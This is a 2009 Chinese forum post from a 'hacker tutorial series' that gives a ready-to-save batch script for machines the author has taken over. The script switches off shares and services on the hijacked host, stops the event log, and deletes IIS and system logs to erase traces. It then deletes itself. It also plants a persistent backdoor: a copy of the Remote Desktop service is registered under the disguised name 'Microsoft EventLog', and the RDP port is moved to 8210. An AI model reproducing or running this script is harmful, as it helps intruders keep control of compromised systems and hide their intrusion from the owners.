设为首页收藏本站
切换到宽版

 找回密码
 注册
搜索
热搜: 回贴
微赢网络技术论坛»论坛 学习网 交流平台 站长知道 黑客教程系列-简明批处理(18-19)
  • 前程无忧官网首页 有什么好的平台可以
  • 最新的销售平台 互联网营销的平台有哪
  • 制作网页的基本流程 网页制作和网页设
  • 【帝国CMS】输出带序号的列表(数字排
  • 网站建设公司 三一,中联,极东泵车的
  • 织梦 建站 织梦网站模版后台怎么更改
  • 云服务官网 哪些网站有免费的简历模板
  • 如何建网站要什么条件 建网站要用什么
  • 吉林市移动公司电话 吉林省退休人员网
  • 设计类毕业论文 网站设计与实现毕业论
返回列表 发新帖
查看: 15743|回复: 1

黑客教程系列-简明批处理(18-19)

[复制链接]
发表于 2009-11-23 00:16:56 | 显示全部楼层 |阅读模式 IP:江苏扬州
2.全面加固系统(给肉鸡打补丁)的批处理文件
  ------------------------ cut here then save as .bat or .cmd file ---------------------------
  @echo Windows Registry Editor Version 5.00 >patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
  @echo "AutoShareServer"=dword:00000000 >>patch.dll
  @echo "AutoShareWks"=dword:00000000 >>patch.dll
  @REM [禁止共享]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
  @echo "restrictanonymous"=dword:00000001 >>patch.dll
  @REM [禁止匿名登录]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
  @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
  @REM [禁止及文件访问和打印共享]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll
  @echo "Start"=dword:00000004 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
  @echo "Start"=dword:00000004 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
  @echo "ShutdownWithoutLogon"="0" >>patch.dll
  @REM [禁止登录前关机]
  @echo "DontDisplayLastUserName"="1" >>patch.dll
  @REM [禁止显示前一个登录用户名称]
  @regedit /s patch.dll
 ------------------------ cut here then save as .bat or .cmd file ---------------------------
  下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。
  @regedit /s patch.dll
  @net stop w3svc
  @net stop event log
  @del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
  @del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
  @del c:\winnt\system32\config\*.event /f /q
  @del c:\winnt\system32dtclog\*.* /f /q
  @del c:\winnt\*.txt /f /q
  @del c:\winnt\*.log /f /q
  @net start w3svc
  @net start event log
  @rem [删除日志]
  @net stop lanmanserver /y
  @net stop Schedule /y
  @net stop RemoteRegistry /y
  @del patch.dll
  @echo The server has been patched,Have fun.
  @del patch.bat
  @REM [禁止一些危险的服务。]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll
  @echo "PortNumber"=dword:00002010 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll
  @echo "PortNumber"=dword:00002012 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll
  @echo "Start"=dword:00000002 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll
  @echo "Start"=dword:00000002 >>patch.dll
  @echo "ErrorControl"=dword:00000001 >>patch.dll
  @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll
  @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll
  @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
  @echo "ObjectName"="LocalSystem" >>patch.dll
  @echo "Type"=dword:00000010 >>patch.dll
  @echo "Description"="Keep record of the program and windows message。" >>patch.dll
  @echo "DisplayName"="Microsoft EventLog" >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll
  @echo "Start"=dword:00000004 >>patch.dll
  @copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
  @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-10-1 07:36 , Processed in 0.367842 second(s), 15 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表